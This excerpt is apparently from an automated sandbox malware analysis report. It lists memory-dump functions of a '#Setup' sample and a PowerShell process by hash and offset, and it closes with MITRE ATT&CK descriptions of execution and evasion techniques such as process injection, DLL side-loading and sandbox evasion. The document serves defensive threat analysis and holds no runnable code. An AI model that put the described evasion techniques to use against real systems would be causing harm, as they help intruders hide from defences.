String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: ad2dd5fb9202f3a253114f1d81e1988fce99c7d2ba3266b9f2c53c96a064022d
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 4F11A033A051E10EC3169E3C84106A5BFA64AD3539F5DC399E4B89F2D6C632C9CA8350

Function 0298EC40 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7302bea21950beb890efd30ea89a0391cdf497665972d9c9b1264196745fcf7c
Instruction ID: 515f606a6897d8a2b4b781348d1558b13fef42ca0d3ad4861c6a1b55e221f8dc
Opcode Fuzzy Hash: 7302bea21950beb890efd30ea89a0391cdf497665972d9c9b1264196745fcf7c
Instruction Fuzzy Hash: 0A113479A4C211ABE2208F18CC45B3B73E6A78A700F58961CF6D1A72D5C770E800CB8A

Function 0297B594 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6752e663a43a61e14915eb6a89a13b96bb39e182d8f74863516537d2e187c832
Instruction ID: a40d27954d51df42ee860c20f9fc7c96b0d0b1917e4d3519e4ba51180adda403
Opcode Fuzzy Hash: 6752e663a43a61e14915eb6a89a13b96bb39e182d8f74863516537d2e187c832
Instruction Fuzzy Hash: B9012CF170030197EB20EE6584E4B3BB2AE6F8571CF19552CDA1957340EB7AE805CBA1

Function 0297913F Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3aded910840780879f4d75c47d764ef9dba135a7e170abe9c8b2c7f5814bd50
Instruction ID: 049b721e88cdd91284fb1534a1d6341c7f86ff25c44174bfc9a68903db7658ba
Opcode Fuzzy Hash: c3aded910840780879f4d75c47d764ef9dba135a7e170abe9c8b2c7f5814bd50
Instruction Fuzzy Hash: 5701AD35A08311CFE728CF24C895A7BB3F6EBC6714F15582CD586232A1D734A822CB86

Function 029795BC Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8378b51325a7e965d155e2587418e3fd8ba6da1a1caf2ffddf86e9b51145b14
Instruction ID: fff31d9167c20e46a5cd630bb829714ccd3e77358920dcb30e9f3d16801c0b76
Opcode Fuzzy Hash: e8378b51325a7e965d155e2587418e3fd8ba6da1a1caf2ffddf86e9b51145b14
Instruction Fuzzy Hash: E911C275A08340CFE714CF10C95162FB3A2FFCA314F065A2CD98823662C730AD02CB96

Function 0297B182 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d54cb6f5391e720629e3e78075b151d896c9a89e517a4d102e07f8fc5c62479b
Instruction ID: 492f97b54d5e87d924c80bb2c65d0e2f6d319398bc8115987497e757869af268
Opcode Fuzzy Hash: d54cb6f5391e720629e3e78075b151d896c9a89e517a4d102e07f8fc5c62479b
Instruction Fuzzy Hash: D101D671608340CFE714CF14D96267BB3A2FBCA308F05592CD99517126C731AC11CB8A

Function 0297E7F8 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 902cdc69c6bae6a0ca589d6d29879a88c190b2b4bf761574541e77bd232aa99d
Instruction ID: 2f7ea5cc33a2d8b76199085a430efcbbfae911e0ecb2c19bb3ea04d2baf5e7c4
Opcode Fuzzy Hash: 902cdc69c6bae6a0ca589d6d29879a88c190b2b4bf761574541e77bd232aa99d
Instruction Fuzzy Hash: FB1125366456419FC715CF25CC90AA2FBE2EB8A300B18D66DC0AAC7340CB34A406CB58

Function 029781B8 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 414e73104f9de20750cbc0f6e81db82c03451901ecf0febebd0c6afd02c899a6
Instruction ID: f104df2dbd06ed2d9a3c55fb6cca0090bc08fe794edf38c7ed4722304b80a982
Opcode Fuzzy Hash: 414e73104f9de20750cbc0f6e81db82c03451901ecf0febebd0c6afd02c899a6
Instruction Fuzzy Hash: E9F096544083C49BDB05CF2548547B67FA4BF13645F08A59CF8E55B242D725D209DB2A

Function 029543F4 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6784032faf5c591272a4ed229792374baed611e6fd6fd10fc5dba5234d086bb
Instruction ID: 7b3efce0642071df31aeb1711a9858390185403c98863877888d1893c668b8f8
Opcode Fuzzy Hash: a6784032faf5c591272a4ed229792374baed611e6fd6fd10fc5dba5234d086bb
Instruction Fuzzy Hash: A1F08B3A7552250B9750CDB9ECC0A27B3D6E7DA208B0A153CED58D3341C631E405C3A0

Function 02968288 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aff009889ef5e87803d01c7e0a4b570d3d447c139fe8717d5ddb66024b753249
Instruction ID: d799c67a9fa5c12ff0822a49d701f47b8e4385a1a0f5f736d853af2fbbf75842
Opcode Fuzzy Hash: aff009889ef5e87803d01c7e0a4b570d3d447c139fe8717d5ddb66024b753249
Instruction Fuzzy Hash: 7CF03A2000D7D18ADB628B3850247FBBFE59F97764F1819ADC0D597182CA25C456CB5A

Function 0297CE8C Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 285aa5654f5707848172e071ce33d2338e9db517fefb677aa9acd7811373a337
Instruction ID: f175f2e30e0b2df4dbfbdf3036b74a20394760d419a5d20679addabf8f947745
Opcode Fuzzy Hash: 285aa5654f5707848172e071ce33d2338e9db517fefb677aa9acd7811373a337
Instruction Fuzzy Hash: 67F05471640600ABC7559F24DE40E56BBB3AFC6710F295128D59923B20DB35B915CF54

Function 02950D87 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
Instruction ID: 3075bbf4d0a85d1bfa86638e3b859f2bfcda3cad186b6afb56e3cd1c30e10034
Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
Instruction Fuzzy Hash: 3D01B634A01218EFCB54EF98C284AADF7B6FF48314F208599D805AB381D732BE81DB40

Function 0297C569 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca9999fb788a0f596972d45547451c70ab31f0127a2fa4fd04a47f13a9e74bcb
Instruction ID: cd16966cc65515699dd603fe56ac1fafcd9803ce6b3918a993f83510de894457
Opcode Fuzzy Hash: ca9999fb788a0f596972d45547451c70ab31f0127a2fa4fd04a47f13a9e74bcb
Instruction Fuzzy Hash: EEF0E52824C5C28FE7098B39D4A1632BFE29F43204F28908EC4C207362D3339816C709

Function 02974452 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59d35066d047d39ae3af001f757e22bb22ebf14a1ace97e9641cd665ce6f14c6
Instruction ID: c9f8770890897353c4efc45f5b9481de72d49ec8227d808a2b1f51f14fea7572
Opcode Fuzzy Hash: 59d35066d047d39ae3af001f757e22bb22ebf14a1ace97e9641cd665ce6f14c6
Instruction Fuzzy Hash: D3D012B9E0652B8BE3104F215C59626B6739F87111F0ED1A04E407F1D6C361E8074588

Function 0296A20A Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18602180ac7324ecab5a3e76a403078823c1c3cb0f30fd7032b274da4b583095
Instruction ID: 5c1cd45777aba93bd507014d1ba27b2625a14e6ee49ac7b0ae6ccbccf125cf1c
Opcode Fuzzy Hash: 18602180ac7324ecab5a3e76a403078823c1c3cb0f30fd7032b274da4b583095
Instruction Fuzzy Hash: 57B0123080B15CCFC3000F306008039FA717D03203F0130D0E088B3011C361C5058A1E

Function 029661FA Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 913d87f1e92a5344d74e7f6823accf5e56a0b37ff3ba32eedc2a1ec3ae109335
Instruction ID: 3c43a8e3dd679a4a7ab2ba62f8397fe49392b44c4c9ef8543b61c6715d947f87
Opcode Fuzzy Hash: 913d87f1e92a5344d74e7f6823accf5e56a0b37ff3ba32eedc2a1ec3ae109335
Instruction Fuzzy Hash: 18A00234E481008FD3088F14F450B75E231A7C7305F1030299505735948655D888850D

Function 0297A6D4 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35873e5eae528673699bc8e47a42cbe9701b3ba3e969827cafdc986492a40f3d
Instruction ID: 5b6d083ff748d8fdae0d94c7bd572414a49f7f9a75790d5ac99edeb636136690
Opcode Fuzzy Hash: 35873e5eae528673699bc8e47a42cbe9701b3ba3e969827cafdc986492a40f3d
Instruction Fuzzy Hash: 5BB00138A882408BC268CF04D491AB5F3B9B78B201F117818D889E3256CA20E8088A0E

Function 02977F2A Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c7abf60b378186b1116ea18b75f4260cedf67f5f359e03727f29af3b86e2fb9
Instruction ID: 434fc9a7dbbb24fec564cf0c1494862355fb2a836e7b9b3843d242fd0aaa2f0a
Opcode Fuzzy Hash: 9c7abf60b378186b1116ea18b75f4260cedf67f5f359e03727f29af3b86e2fb9
Instruction Fuzzy Hash: 3BA00274E4910087D3088F14D950B71E631D74B321F11342990067359486B5D8C4850E

Function 0296622B Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2950000_#Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6077b7dd92604dca54af67f38024f4e264f990d33d5df0697b7321a622ad74e3
Instruction ID: 7608731064fdbf4abdcabdaaea87d23e1d5f25e883f2ebde46e61bd515b1bb7d
Opcode Fuzzy Hash: 6077b7dd92604dca54af67f38024f4e264f990d33d5df0697b7321a622ad74e3
Instruction Fuzzy Hash: 6A900224D481008A81008F44A840670E279724B102F203510D008F3011C251D404450C

Analysis Process: powershell.exePID: 2356, Parent PID: 2064COMMON

Executed Functions

Function 071D1798 Relevance: 3.3, Strings: 2, Instructions: 835COMMON

Download Yara Rule

Strings

Ll, xrefs: 071D187F
Ll, xrefs: 071D188D

Memory Dump Source

Source File: 00000005.00000002.2378743324.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_71d0000_powershell.jbxd

Similarity

API ID:
String ID: Ll$Ll
API String ID: 0-1894504786
Opcode ID: 014401f70b3e65ecf93f78125c6fc8912eafd49a95403a51c01854a5d399b0dd
Instruction ID: 20f73b4b7c06d647d6df8dcf8fa8f1d1d221ef7d15f7dda17618d09da3efc7ed
Opcode Fuzzy Hash: 014401f70b3e65ecf93f78125c6fc8912eafd49a95403a51c01854a5d399b0dd
Instruction Fuzzy Hash: 51426BB2704319AFD7268B79C8117ABBBF2AFC2211F16807AD505CB291DB35CD41CBA1

Function 00E933E0 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2360993930.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92fc15d59152011b4ca965a494c76f283fc1f8c85d9ba55a1a26a903b3e35ef1
Instruction ID: ed29e1d92c00cbf2b9f431c5e6840b1f60851d48812c959d75ee2ce7c76d9479
Opcode Fuzzy Hash: 92fc15d59152011b4ca965a494c76f283fc1f8c85d9ba55a1a26a903b3e35ef1
Instruction Fuzzy Hash: 6B816B7150D3859FCB07DB78C8A45AABFB0EF47304B1A41D7C580DB2A2D225AD58CBA5

Function 00E96000 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2360993930.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8db9869b25ca8f9e56953b255a08f97bd09534fd48f91af71e51168c1772306a
Instruction ID: b785271deccf3b4853a975b5900b521ea81ec6c8553e88119f2c63bdd389c82c
Opcode Fuzzy Hash: 8db9869b25ca8f9e56953b255a08f97bd09534fd48f91af71e51168c1772306a
Instruction Fuzzy Hash: DC614B75A00218AFCF14CF98D490A9DFBB1FF49324F25815AE859AB352C731ED82CB90

Function 00E94983 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2360993930.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 203ca89b9a521fd9314392a956cb26aab9bf9b973ea789858d8d82b40123970f
Instruction ID: 061780a7d2ff6bd0985de29f74d64c4d3af2d8079b009acd659efa418c5c420f
Opcode Fuzzy Hash: 203ca89b9a521fd9314392a956cb26aab9bf9b973ea789858d8d82b40123970f
Instruction Fuzzy Hash: 865117B5A01219EFCB15CF98D480A9DFBB1FF89314F248169E809AB352D771ED42CB84

Function 071D1A54 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2378743324.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_71d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b998347834568eb2afd22dc154d92bfdc1c1a52389b4fa940339eaf0122f83cd
Instruction ID: f204e7584c832a5d7d50344daefc1bec2998e0439eee45be49c3349239cc4ea4
Opcode Fuzzy Hash: b998347834568eb2afd22dc154d92bfdc1c1a52389b4fa940339eaf0122f83cd
Instruction Fuzzy Hash: 46414BF2A1021AEFCB258F658941B7A7BF29F81350F068065D9059F2D1D739DE40DFA1

Function 00E933D9 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2360993930.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7136f45840c8781e6e365e0c39f7bce4bd425cbe356686309e9d13b06eb76d4e
Instruction ID: ec39fa9a7c0d92f8393ec951e52f6b15a72026ccaf345a0241c428efd8ecc061
Opcode Fuzzy Hash: 7136f45840c8781e6e365e0c39f7bce4bd425cbe356686309e9d13b06eb76d4e
Instruction Fuzzy Hash: 83413974A00505DFCB15CFA9C1949AEFBB1FF48314B129269D915AB364C736FD50CBA0

Function 00E9496E Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2360993930.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4250e83f9e051cf6b733de084c6bbc7367ea4d8b5e5b6446234824f7f672bc9
Instruction ID: a1ac0bde262fe97d459b1bdf616c834114a358a31fb1cae905ef3a5a65cc6ed5
Opcode Fuzzy Hash: a4250e83f9e051cf6b733de084c6bbc7367ea4d8b5e5b6446234824f7f672bc9
Instruction Fuzzy Hash: 68411AB5A05259AFCB05CF98D480E9DFBB2AF89314F148196E804AB352D730ED42CB94

Function 00E92A90 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2360993930.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ca25d353909456fb9d65e843b2c4b2cd141125ecbe20d8b4c1e521cc4b414a7
Instruction ID: 5c1c031ecce4c5984a2ac6b7baaa1e897d1bc712a9e05109bee75065eb733759
Opcode Fuzzy Hash: 7ca25d353909456fb9d65e843b2c4b2cd141125ecbe20d8b4c1e521cc4b414a7
Instruction Fuzzy Hash: 23317075A04255EFCF01CF58C894AAAFBB1FF49310B1581A9D549EB352D735EC81CBA0

Function 00E92A87 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2360993930.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da5cda3c62219415c4c2c5720fd7d6c12de246b5720d04d54eef932badc2bf1f
Instruction ID: 14f857132c0fbae88439eb16ebe33be9e4058ce550a4dcbd33155806be4a6d3e
Opcode Fuzzy Hash: da5cda3c62219415c4c2c5720fd7d6c12de246b5720d04d54eef932badc2bf1f
Instruction Fuzzy Hash: 4E21E375A00619DFCF04CF99C994AAAFBB1FF88310B148569E909A7761D731EC91CBA0

Function 00E948FB Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2360993930.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_e90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2f7c7e4650deebe9eecb12e74a2c8446483f5388183afecc58ba9e6bf404ca9
Instruction ID: 555b155c266e2400dc8e55201470c9b7324f99974f0ca69315d416c8a2c8e1bf
Opcode Fuzzy Hash: d2f7c7e4650deebe9eecb12e74a2c8446483f5388183afecc58ba9e6bf404ca9
Instruction Fuzzy Hash: 210144B8A00215DFCB00DB9CD490AEEF775FF8E300B249159D95A97361C635EC038B50

Function 0089D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2359985272.000000000089D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0089D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_89d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3b22dbc6369d072ad9ab8becaf3ecaf934dfa85c2036e1cea39d3fbb3ec564
Instruction ID: 2d145ff4c97815638cc47d6df5623aab50c21f50405d4b7de6a0d1534e7272bb
Opcode Fuzzy Hash: 4f3b22dbc6369d072ad9ab8becaf3ecaf934dfa85c2036e1cea39d3fbb3ec564
Instruction Fuzzy Hash: 0B01F271004B44EAEB10AA26CD80B67FFD8FF42724F1CC11AED088B282C2799845C6B5

Function 0089D01C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2359985272.000000000089D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0089D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_89d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8296485fa1ffa8d5c8c218c7a4660a92408ecec0c90227c80a479b9d550f5e2e
Instruction ID: 0a7006c9d1cce4320b83f1783e93e14f4c5984efff6ab4c122601ebb67e8bd81
Opcode Fuzzy Hash: 8296485fa1ffa8d5c8c218c7a4660a92408ecec0c90227c80a479b9d550f5e2e
Instruction Fuzzy Hash: 04F0CD72005744AEEB108E16CC84BA3FFE8EB91734F18C05AED484E282C2799844CAB1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

